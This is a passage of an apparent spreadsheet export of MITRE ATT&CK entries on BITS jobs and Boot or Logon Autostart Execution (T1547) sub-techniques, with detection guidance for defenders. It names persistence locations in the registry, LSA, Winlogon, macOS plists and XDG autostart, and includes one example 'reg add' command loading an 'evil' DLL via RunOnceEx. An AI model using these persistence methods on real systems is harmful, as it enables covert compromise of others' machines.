    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;).(Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic; Red Canary; Ricardo Dias</t>
  </si>
  <si>
    <t>Firewall, Host forensic analysis</t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution</t>
  </si>
  <si>
    <t>Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547</t>
  </si>
  <si>
    <t>23 January 2020</t>
  </si>
  <si>
    <t>Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns)  Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. 
Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To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
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.
Monitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.</t>
  </si>
  <si>
    <t>Command: Command Execution, Driver: Driver Load, File: File Creation, File: File Modification, Kernel: Kernel Module Load, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Administrator, User, root</t>
  </si>
  <si>
    <t>T1547.014</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Active Setup</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
Adversaries may abuse Active Setup by creating a key under &lt;code&gt; HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt; and setting a malicious value for &lt;code&gt;StubPath&lt;/code&gt;. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
Adversaries can abuse these components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</si>
  <si>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https://attack.mitre.org/techniques/T1547/014</t>
  </si>
  <si>
    <t>18 December 2020</t>
  </si>
  <si>
    <t>Monitor Registry key additions and/or modifications to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)</t>
  </si>
  <si>
    <t>Administrator</t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Authentication Package</t>
  </si>
  <si>
    <t>Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&amp;lt;target binary&amp;gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/002</t>
  </si>
  <si>
    <t>24 January 2020</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1547.006</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) 
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/006</t>
  </si>
  <si>
    <t>30 March 2021</t>
  </si>
  <si>
    <t>Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:&lt;code&gt;modprobe&lt;/code&gt;, &lt;code&gt;insmod&lt;/code&gt;, &lt;code&gt;lsmod&lt;/code&gt;, &lt;code&gt;rmmod&lt;/code&gt;, or &lt;code&gt;modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
For macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and correlate with other unknown or suspicious activity.
Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt; On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Kernel: Kernel Module Load</t>
  </si>
  <si>
    <t>Anastasios Pingios; Jeremy Galloway; Red Canary; Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>root</t>
  </si>
  <si>
    <t>T1547.008</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: LSASS Driver</t>
  </si>
  <si>
    <t>Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/008</t>
  </si>
  <si>
    <t xml:space="preserve">With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)
Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. </t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>T1547.011</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Plist Modification</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by &lt; &gt;. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as &lt;code&gt;/Library/Preferences&lt;/code&gt; (which execute with elevated privileges) and &lt;code&gt;~/Library/Preferences&lt;/code&gt; (which execute with a user's privileges). 
Adversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) 
A specific plist used for execution at login is &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt;.(Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.(Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to "hide" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method &lt;code&gt; SMLoginItemSetEnabled&lt;/code&gt; can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/011</t>
  </si>
  <si>
    <t>File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
All the login items created via shared file lists are viewable by going to the Apple menu -&gt; System Preferences -&gt; Users &amp; Groups -&gt; Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in &lt;code&gt; Contents/Library/LoginItems &lt;/code&gt; within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Port Monitors</t>
  </si>
  <si>
    <t>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. 
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. 
Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Stefan Kanthak; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Print Processors</t>
  </si>
  <si>
    <t>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. 
Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the &lt;code&gt;AddPrintProcessor&lt;/code&gt; API call with an account that has &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; enabled. Alternatively, a print processor can be registered to the print spooler service by adding the &lt;code&gt;HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver&lt;/code&gt; Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver&lt;/code&gt; or &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver&lt;/code&gt; as they pertain to print processor installations.
Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Mathieu Tartare, ESET</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Re-opened Applications</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at &lt;code&gt;~/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; and &lt;code&gt;~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist&lt;/code&gt;. 
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/007</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is &lt;code&gt;C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;/code&gt;. The startup folder path for all users is &lt;code&gt;C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp&lt;/code&gt;.
The following run keys are created by default on Windows systems:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&lt;/code&gt; is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
The following Registry keys can control automatic startup of services during boot:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; subkeys can automatically launch programs.
Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run when any user logs on.
By default, the multistring &lt;code&gt;BootExecute&lt;/code&gt; value of the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; is set to &lt;code&gt;autocheck autochk *&lt;/code&gt;. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/001</t>
  </si>
  <si>
    <t>Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity,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</si>
  <si>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File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe</t>
  </si>
  <si>
    <t>T1547.005</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Security Support Provider</t>
  </si>
  <si>
    <t>Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/005</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Shortcut Modification</t>
  </si>
  <si>
    <t>Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/009</t>
  </si>
  <si>
    <t>Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.
Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)</t>
  </si>
  <si>
    <t>Bobby, Filar, Elastic; David French, Elastic; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Time Providers</t>
  </si>
  <si>
    <t>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\&lt;/code&gt;. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/003</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt; as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Scott Lundgren, @5twenty9, Carbon Black</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in &lt;code&gt;HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) 
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/004</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>T1547.013</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: XDG Autostart Entries</t>
  </si>
  <si>
    <t>Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; or &lt;code&gt;~/.config/autostart&lt;/code&gt; directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)
Within an XDG autostart entry file, the &lt;code&gt;Type&lt;/code&gt; key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The &lt;code&gt;Name&lt;/code&gt; key indicates an arbitrary name assigned by the creator and the &lt;code&gt;Exec&lt;/code&gt; key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)
Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.</t>
  </si>
